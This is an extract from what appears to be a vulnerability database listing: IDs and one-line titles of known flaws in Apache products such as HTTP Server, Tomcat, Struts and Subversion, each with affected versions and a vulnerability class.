| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
| [74468] Apache Batik up to 1.6 denial of service
| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
| [74174] Apache WSS4J up to 2.0.0 privilege escalation
| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
| [73731] Apache XML Security unknown vulnerability
| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
| [73593] Apache Traffic Server up to 5.1.0 denial of service
| [73511] Apache POI up to 3.10 Deadlock denial of service
| [73510] Apache Solr up to 4.3.0 cross site scripting
| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
| [73173] Apache CloudStack Stack-Based unknown vulnerability
| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
| [72890] Apache Qpid 0.30 unknown vulnerability
| [72887] Apache Hive 0.13.0 File Permission privilege escalation
| [72878] Apache Cordova 3.5.0 cross site request forgery
| [72877] Apache Cordova 3.5.0 cross site request forgery
| [72876] Apache Cordova 3.5.0 cross site request forgery
| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
| [71629] Apache Axis2/C spoofing
| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
| [70809] Apache POI up to 3.11 Crash denial of service
| [70808] Apache POI up to 3.10 unknown vulnerability
| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
| [70749] Apache Axis up to 1.4 getCN spoofing
| [70701] Apache Traffic Server up to 3.3.5 denial of service
| [70700] Apache OFBiz up to 12.04.03 cross site scripting
| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
| [70661] Apache Subversion up to 1.6.17 denial of service
| [70660] Apache Subversion up to 1.6.17 spoofing
| [70659] Apache Subversion up to 1.6.17 spoofing
| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
| [69846] Apache HBase up to 0.94.8 information disclosure
| [69783] Apache CouchDB up to 1.2.0 memory corruption
| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid() privilege escalation
| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
| [69431] Apache Archiva up to 1.3.6 cross site scripting
| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init() privilege escalation
| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
| [66739] Apache Camel up to 2.12.2 unknown vulnerability
| [66738] Apache Camel up to 2.12.2 unknown vulnerability
| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
| [66695] Apache CouchDB up to 1.2.0 cross site scripting
| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
| [66356] Apache Wicket up to 6.8.0 information disclosure
| [12209] Apache Tomcat 8.0.0-RC1/8.0.1/7.0.0/7.0.50 Content-Type Header for Multi-Part Request Infinite Loop denial of service
| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
| [65668] Apache Solr 4.0.0 Updater denial of service
| [65665] Apache Solr up to 4.3.0 denial of service
| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
| [65410] Apache Struts 2.3.15.3 cross site scripting
| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
| [65340] Apache Shindig 2.5.0 information disclosure
| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
12789| [10826] Apache Struts 2 File privilege escalation
12790| [65204] Apache Camel up to 2.10.1 unknown vulnerability
12791| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
12792| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
12793| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
12794| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file() race condition
12795| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
12796| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
12797| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
12798| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
12799| [64722] Apache XML Security for C++ Heap-based memory corruption
12800| [64719] Apache XML Security for C++ Heap-based memory corruption
12801| [64718] Apache XML Security for C++ verify denial of service
12802| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
12803| [64716] Apache XML Security for C++ spoofing
12804| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
12805| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
12806| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
12807| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
12808| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
12809| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
12810| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
12811| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
12812| [64485] Apache Struts up to 2.2.3.0 privilege escalation
12813| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
12814| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
12815| [64467] Apache Geronimo 3.0 memory corruption
12816| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
12817| [64457] Apache Struts up to 2.2.3.0 cross site scripting
12818| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
12819| [9184] Apache Qpid up to 0.20 SSL misconfiguration
12820| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
12821| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
12822| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
12823| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
12824| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
12825| [8873] Apache Struts 2.3.14 privilege escalation
12826| [8872] Apache Struts 2.3.14 privilege escalation
12827| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
12828| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
12829| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
12830| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
12831| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
12832| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
12833| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
12834| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
12835| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
12836| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
12837| [64006] Apache ActiveMQ up to 5.7.0 denial of service
12838| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
12839| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
12840| [8427] Apache Tomcat Session Transaction weak authentication
12841| [63960] Apache Maven 3.0.4 Default Configuration spoofing
12842| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
12843| [63750] Apache qpid up to 0.20 checkAvailable denial of service
12844| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
12845| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
12846| [63747] Apache Rave up to 0.20 User Account information disclosure
12847| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
12848| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
12849| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
12850| [7687] Apache CXF up to 2.7.2 Token weak authentication
12851| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
12852| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
12853| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
12854| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
12855| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
12856| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
12857| [63090] Apache Tomcat up to 4.1.24 denial of service
12858| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
12859| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
12860| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
12861| [62833] Apache CXF -/2.6.0 spoofing
12862| [62832] Apache Axis2 up to 1.6.2 spoofing
12863| [62831] Apache Axis up to 1.4 Java Message Service spoofing
12864| [62830] Apache Commons-httpclient 3.0 Payments spoofing
12865| [62826] Apache Libcloud up to 0.11.0 spoofing
12866| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
12867| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
12868| [62661] Apache Axis2 unknown vulnerability
12869| [62658] Apache Axis2 unknown vulnerability
12870| [62467] Apache Qpid up to 0.17 denial of service
12871| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
12872| [6301] Apache HTTP Server mod_pagespeed cross site scripting
12873| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
12874| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
12875| [62035] Apache Struts up to 2.3.4 denial of service
12876| [61916] Apache QPID 0.14/0.16/0.5/0.6 unknown vulnerability
12877| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
12878| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
12879| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
12880| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
12881| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
12882| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
12883| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
12884| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
12885| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
12886| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
12887| [61229] Apache Sling up to 2.1.1 denial of service
12888| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
12889| [61094] Apache Roller up to 5.0 cross site scripting
12890| [61093] Apache Roller up to 5.0 cross site request forgery
12891| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
12892| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
12893| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow() File memory corruption
12894| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
12895| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
12896| [60708] Apache Qpid 0.12 unknown vulnerability
12897| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
12898| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
12899| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
12900| [4882] Apache Wicket up to 1.5.4 directory traversal
12901| [4881] Apache Wicket up to 1.4.19 cross site scripting
12902| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
12903| [60352] Apache Struts up to 2.2.3 memory corruption
12904| [60153] Apache Portable Runtime up to 1.4.3 denial of service
12905| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
12906| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
12907| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
12908| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
12909| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
12910| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
12911| [4571] Apache Struts up to 2.3.1.2 privilege escalation
12912| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
12913| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
12914| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
12915| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
12916| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
12917| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
12918| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
12919| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
12920| [59888] Apache Tomcat up to 6.0.6 denial of service
12921| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
12922| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
12923| [4512] Apache Struts up to 2.2.3 CookieInterceptor command injection
12924| [59850] Apache Geronimo up to 2.2.1 denial of service
12925| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
12926| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
12927| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
12928| [58413] Apache Tomcat up to 6.0.10 spoofing
12929| [58381] Apache Wicket up to 1.4.17 cross site scripting
12930| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
12931| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
12932| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
12933| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
12934| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
12935| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
12936| [57568] Apache Archiva up to 1.3.4 cross site scripting
12937| [57567] Apache Archiva up to 1.3.4 cross site request forgery
12938| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
12939| [4355] Apache HTTP Server APR apr_fnmatch denial of service
12940| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
12941| [57425] Apache Struts up to 2.2.1.1 cross site scripting
12942| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
12943| [57025] Apache Tomcat up to 7.0.11 information disclosure
12944| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
12945| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
12946| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
12947| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
12948| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
12949| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
12950| [56512] Apache Continuum up to 1.4.0 cross site scripting
12951| [4285] Apache Tomcat 5.x JVM getLocale() denial of service
12952| [4284] Apache Tomcat 5.x HTML Manager cross site scripting
12953| [4283] Apache Tomcat 5.x ServletContect privilege escalation
12954| [56441] Apache Tomcat up to 7.0.6 denial of service
12955| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
12956| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
12957| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
12958| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
12959| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
12960| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
12961| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
12962| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
12963| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
12964| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
12965| [54693] Apache Traffic Server DNS Cache unknown vulnerability
12966| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
12967| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
12968| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
12969| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
12970| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
12971| [54012] Apache Tomcat up to 6.0.10 denial of service
12972| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
12973| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
12974| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
12975| [52894] Apache Tomcat up to 6.0.7 information disclosure
12976| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
12977| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
12978| [52786] Apache Open For Business Project up to 09.04 cross site scripting
12979| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
12980| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
12981| [52584] Apache CouchDB up to 0.10.1 information disclosure
12982| [51757] Apache HTTP Server 2.0.44 cross site scripting
12983| [51756] Apache HTTP Server 2.0.44 spoofing
12984| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
12985| [51690] Apache Tomcat up to 6.0 directory traversal
12986| [51689] Apache Tomcat up to 6.0 information disclosure
12987| [51688] Apache Tomcat up to 6.0 directory traversal
12988| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
12989| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
12990| [50626] Apache Solr 1.0.0 cross site scripting
12991| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
12992| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
12993| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
12994| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
12995| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
12996| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
12997| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
12998| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
12999| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
13000| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
13001| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
13002| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
13003| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
13004| [47640] Apache Struts 2.0.11/2.0.6/2.0.8/2.0.9/2.1 cross site scripting
13005| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
13006| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
13007| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
13008| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
13009| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
13010| [47214] Apachefriends xampp 1.6.8 spoofing
13011| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
13012| [47162] Apachefriends XAMPP 1.4.4 weak authentication
13013| [47065] Apache Tomcat 4.1.23 cross site scripting
13014| [46834] Apache Tomcat up to 5.5.20 cross site scripting
13015| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
13016| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
13017| [86625] Apache Struts directory traversal
13018| [44461] Apache Tomcat up to 5.5.0 information disclosure
13019| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
13020| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
13021| [43663] Apache Tomcat up to 6.0.16 directory traversal
13022| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
13023| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
13024| [43516] Apache Tomcat up to 4.1.20 directory traversal
13025| [43509] Apache Tomcat up to 6.0.13 cross site scripting
13026| [42637] Apache Tomcat up to 6.0.16 cross site scripting
13027| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
13028| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
13029| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
13030| [40924] Apache Tomcat up to 6.0.15 information disclosure
13031| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
13032| [40922] Apache Tomcat up to 6.0 information disclosure
13033| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
13034| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
13035| [40656] Apache Tomcat 5.5.20 information disclosure
13036| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
13037| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
13038| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
13039| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
13040| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
13041| [40234] Apache Tomcat up to 6.0.15 directory traversal
13042| [40221] Apache HTTP Server 2.2.6 information disclosure
13043| [40027] David Castro Apache Authcas 0.4 sql injection
13044| [3495] Apache OpenOffice up to 2.3 Database Document Processor Designfehler
13045| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
13046| [3414] Apache Tomcat WebDAV Stored Umgehungs-Angriff
13047| [39489] Apache Jakarta Slide up to 2.1 directory traversal
13048| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
